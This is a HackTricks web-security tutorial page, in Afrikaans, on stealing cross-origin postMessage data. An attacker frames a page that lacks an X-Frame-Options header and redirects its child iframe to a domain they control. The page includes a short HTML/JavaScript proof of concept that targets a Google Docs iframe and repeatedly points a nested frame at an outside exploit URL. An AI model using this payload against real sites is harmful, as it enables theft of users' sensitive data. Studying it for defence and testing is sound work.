Afrikaans - Ht
HackTricks Training Twitter Linkedin Sponsor

Steal postmessage modifying iframe location

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Verandering van kind-iframe-posisies

Volgens hierdie uiteensetting, as jy 'n webbladsy kan iframe sonder 'n X-Frame-Header wat 'n ander iframe bevat, kan jy die posisie van daardie kind-iframe verander.

Byvoorbeeld, as abc.com efg.com as 'n iframe het en abc.com nie 'n X-Frame-header het nie, kan ek die efg.com na evil.com oor oorsprong verander deur gebruik te maak van frames.location.

Dit is veral nuttig in postMessages, want as 'n bladsy sensitiewe data stuur deur 'n wildcard soos windowRef.postmessage("","*"), is dit moontlik om die posisie van die betrokke iframe (kind of ouer) na 'n aanvaller se beheerde posisie te verander en daardie data te steel.

<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);

function exp(){
//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
</html>
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
PreviousBypassing SOP with Iframes - 2NextProxy / WAF Protections Bypass

Last updated